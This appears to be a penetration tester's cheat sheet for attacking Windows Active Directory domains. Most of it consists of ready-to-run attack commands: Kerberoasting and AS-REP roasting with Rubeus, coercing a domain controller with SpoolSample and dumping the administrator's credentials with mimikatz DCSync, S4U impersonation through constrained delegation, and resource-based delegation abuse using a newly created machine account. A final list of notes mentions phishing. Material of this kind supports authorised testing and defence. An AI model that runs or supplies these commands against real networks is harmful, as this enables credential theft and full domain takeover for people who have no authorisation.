# Domain Reconnaissance on Windows

#### GPO

Check GPOs which enable group of users to have remote access (PsExec, WMI, WinRM, RDP, etc) to specific hosts.

#### Kerberoasting

```
rubeus.exe kerberoast /user:svc_sql /nowrap
```

#### ASREPRoasting

```
rubeus.exe asreproast /format:hashcat /user:svc_sql /nowrap
```

#### Unconstrained Delegation

```
rubeus.exe monitor /interval:1 /filtuser:reddc$ /nowrap

Spoolsample.exe reddc redsqlw

rubeus.exe ptt /ticket:[ticket]

mimikatz # lsadump::dcsync /domain:red.com /user:RED\administrator
```

#### Constrained Delegation

```
rubeus.exe tgtdeleg /nowrap

rubeus.exe s4u /impersonate:kevin /user:svc_sql /domain:red.local /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /ptt
```

#### Resource Based Constrained Delegation

```
ipmo .\powermad.ps1

New-MachineAccount -MachineAccount my -Password $(ConvertTo-SecureString '123' -AsPlainText -Force)

ipmo .\Microsoft.ActiveDirectory.Management.dll

Set-ADComputer red09 -PrincipalsAllowedToDelegateToAccount my$ -Server [DC IP] -Verbose

rubeus.exe s4u /user:my$ /rc4:…… /impersonateuser:administrator /msdsspn:CIFS/red09.red.com /ptt
```

#### Internal Web Service

If it is not accessible directly, use SOCKS to access it.

Any computer/users' name contain "web", "svc", etc.

Send a phishing email

Send a document

Execute command

Ping a host

DevOps